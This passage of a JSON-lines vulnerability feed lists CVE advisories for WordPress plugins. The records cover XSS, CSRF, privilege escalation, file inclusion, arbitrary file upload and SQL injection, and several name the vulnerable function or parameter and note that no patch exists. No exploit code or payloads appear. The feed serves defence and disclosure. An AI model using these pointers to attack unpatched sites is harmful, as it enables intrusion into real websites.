page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/872c8328-9089-4bc0-af17-f755524da610?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/872c8328-9089-4bc0-af17-f755524da610?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps.php#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps.php#L238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-gpx-maps\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-gpx-maps\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps-admin-tracks.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps-admin-tracks.php#L249\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11905","slug":"animated-counters","versionImpact":"2.0","description":"The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animatedcounte' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-counters\\\/trunk\\\/animated-counters.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-counters\\\/trunk\\\/animated-counters.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-counters\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-counters\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd2f09c-4bd5-47a5-8d4f-7345aa8925f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd2f09c-4bd5-47a5-8d4f-7345aa8925f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13352","slug":"legull","versionImpact":"1.2.2","description":"The Legull WordPress plugin through 1.2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c141cc0-f79e-42bd-97a6-98829647104c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c141cc0-f79e-42bd-97a6-98829647104c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13826","slug":"email-keep","versionImpact":"1.1","description":"The Email Keep WordPress plugin through 1.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56b143b6-e5db-4037-ab2a-4e4d0cb7a005\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56b143b6-e5db-4037-ab2a-4e4d0cb7a005\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2266","slug":"checkout-mestres-wp","description":"The Checkout Mestres do WP for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the cwmpUpdateOptions() function in versions 8.6.5 to 8.7.5. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/checkout-mestres-wp\\\/trunk\\\/backend\\\/core\\\/base\\\/ajax.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/checkout-mestres-wp\\\/trunk\\\/backend\\\/core\\\/base\\\/ajax.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/checkout-mestres-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/checkout-mestres-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9834fd5b-8445-4c6f-95f9-f0df785c65f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9834fd5b-8445-4c6f-95f9-f0df785c65f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5018","slug":"hive-support","versionImpact":"1.2.4","description":"The Hive Support plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the hs_update_ai_chat_settings() and hive_lite_support_get_all_binbox() functions in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read and overwrite the site\u2019s OpenAI API key and inspection data or modify AI-chat prompts and behavior. This vulnerability is potentially a duplicate of CVE-2025-32208 or\/and CVE-2025-32242.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-ajax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-ajax.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c8722e-07c3-4728-8723-4d4a6188fe5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c8722e-07c3-4728-8723-4d4a6188fe5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8059","slug":"b-blocks","versionImpact":"2.0.6","description":"The B Blocks plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization and improper input validation within the rgfr_registration() function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to create a new account and assign it the administrator role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-blocks\\\/trunk\\\/includes\\\/blocks\\\/RegisterForm.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-blocks\\\/trunk\\\/includes\\\/blocks\\\/RegisterForm.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3340770\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3340770\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee3b389-60c9-4f8e-9428-a71a6d9b20aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee3b389-60c9-4f8e-9428-a71a6d9b20aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4371","slug":"wp-quick-front-end-editor","versionImpact":"5.5.","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Setting Changes in versions up to, and including, 5.5. This is due to lacking both a security nonce and a capabilities check. This makes it possible for low-authenticated attackers to change plugin settings even when they do not have the capabilities to do so.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c392750b-ae4a-48b5-9ccb-43852fb13e27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c392750b-ae4a-48b5-9ccb-43852fb13e27?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4597","slug":"wp-slimstat","versionImpact":"5.0.9","description":"The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slimstat' shortcode in versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52aee4b8-f494-4eeb-8357-71ce8d5bc656?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52aee4b8-f494-4eeb-8357-71ce8d5bc656?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.9\\\/wp-slimstat.php#L892\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.9\\\/wp-slimstat.php#L892\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47833","slug":"theatre","versionImpact":"0.18.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeroen Schmit Theater for WordPress plugin <=\u00a00.18.3 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/theatre\\\/wordpress-theater-for-wordpress-plugin-0-18-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/theatre\\\/wordpress-theater-for-wordpress-plugin-0-18-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6638","slug":"gg-woo-feed","versionImpact":"1.2.4","description":"The GTG Product Feed for Shopping plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_settings' function in versions up to, and including, 1.2.4. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce6b9b0a-e82e-459a-bddf-1c9354bcec00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce6b9b0a-e82e-459a-bddf-1c9354bcec00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gg-woo-feed\\\/trunk\\\/inc\\\/Admin\\\/Admin.php?rev=2933599#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gg-woo-feed\\\/trunk\\\/inc\\\/Admin\\\/Admin.php?rev=2933599#L199\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2136","slug":"wpkoi-templates-for-elementor","versionImpact":"2.5.6","description":"The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Heading widget in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046089\\\/wpkoi-templates-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046089\\\/wpkoi-templates-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38344","slug":"wp-tweet-walls","description":"A cross-site request forgery vulnerability exists in WP Tweet Walls versions prior to 1.0.4. If this vulnerability is exploited, an attacker allows a user who logs in to the WordPress site where the affected plugin is enabled to access a malicious page. As a result, the user may perform unintended operations on the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tweet-walls\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tweet-walls\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9027","slug":"wpzoom-shortcodes","versionImpact":"1.0.5","description":"The WPZOOM Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc03aa9-ad3d-4abb-9c22-cb40875ece47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc03aa9-ad3d-4abb-9c22-cb40875ece47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-shortcodes\\\/trunk\\\/shortcodes\\\/shortcodes.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-shortcodes\\\/trunk\\\/shortcodes\\\/shortcodes.php#L38\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10436","slug":"wpc-smart-messages","versionImpact":"4.2.1","description":"The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.1 via the get_condition_value function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fd87512-def0-4e59-aa2d-b166919474f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fd87512-def0-4e59-aa2d-b166919474f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpc-smart-messages\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpc-smart-messages\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12026","slug":"cf7-message-filter","versionImpact":"1.6.3","description":"The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveFilter() function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new filters.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7044aa-a1e7-4b1d-9f50-5e250426c6b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7044aa-a1e7-4b1d-9f50-5e250426c6b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11902","slug":"slope-widgets","versionImpact":"4.2.11","description":"The Slope Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slope-reservations' shortcode in all versions up to, and including, 4.2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slope-widgets\\\/trunk\\\/slope-reservations.php#L298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slope-widgets\\\/trunk\\\/slope-reservations.php#L298\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slope-widgets\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slope-widgets\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7700f1f3-90e2-450d-9cfe-c922d0cc6a1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7700f1f3-90e2-450d-9cfe-c922d0cc6a1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1510","slug":"custom-post-type-date-archives","versionImpact":"2.7.1","description":"The Custom Post Type Date Archives plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-type-date-archives\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-type-date-archives\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996ade9c-2531-4f43-87f6-eddb2ce98a12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996ade9c-2531-4f43-87f6-eddb2ce98a12?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13825","slug":"email-keep","versionImpact":"1.1","description":"The Email Keep WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/368474a0-550d-49f8-855d-b2010f8b91b5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/368474a0-550d-49f8-855d-b2010f8b91b5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2249","slug":"soj-soundslides","versionImpact":"1.2.2","description":"The SoJ SoundSlides plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the soj_soundslides_options_subpanel() function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soj-soundslides\\\/tags\\\/1.2.2\\\/soj-soundslides.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soj-soundslides\\\/tags\\\/1.2.2\\\/soj-soundslides.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648e7f3-d93a-4a46-ae77-81a94880869c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648e7f3-d93a-4a46-ae77-81a94880869c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12874","slug":"top-comments","versionImpact":"1.0","description":"The Top Comments WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cc14a87-4605-49f6-9d51-0b9eb57e6c9d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cc14a87-4605-49f6-9d51-0b9eb57e6c9d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4966","slug":"wp-online-users-stats","versionImpact":"1.0.0","description":"The WP Online Users Stats plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation within the hk_dataset_results() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a41226ab-9732-4de2-843b-284c011c9224?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a41226ab-9732-4de2-843b-284c011c9224?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7401","slug":"age-restriction","versionImpact":"3.0.2","description":"The Premium Age Verification \/ Restriction for WordPress plugin for WordPress is vulnerable to arbitrary file read and write due to the existence of an insufficiently protected remote support functionality in remote_tunnel.php in all versions up to, and including, 3.0.2. This makes it possible for unauthenticated attackers to read from or write to arbitrary files on the affected site's server which may make the exposure of sensitive information or remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/premium-age-verification-restriction-for-wordpress\\\/11300327\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/premium-age-verification-restriction-for-wordpress\\\/11300327\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0906a45-6d9b-48a0-98ae-df7b591a8848?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0906a45-6d9b-48a0-98ae-df7b591a8848?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6184","slug":"tutor","versionImpact":"3.7.0","description":"The Tutor LMS Pro \u2013 eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter used in the get_submitted_assignments() function in all versions up to, and including, 3.7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Tutor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Only the Pro version is affected.","refs":"[{\"url\":\"https:\\\/\\\/tutorlms.com\\\/\",\"name\":\"https:\\\/\\\/tutorlms.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b41d134-be9e-469f-b26b-ac30d95db0a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b41d134-be9e-469f-b26b-ac30d95db0a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4669","slug":"live-composer-page-builder","versionImpact":"1.5.22","description":"The Page Builder: Live Composer WordPress plugin through 1.5.22 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79f011e4-3422-4307-8736-f27048796aae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79f011e4-3422-4307-8736-f27048796aae\",\"refsource\":\"MISC\",\"tags\":[]}]"}
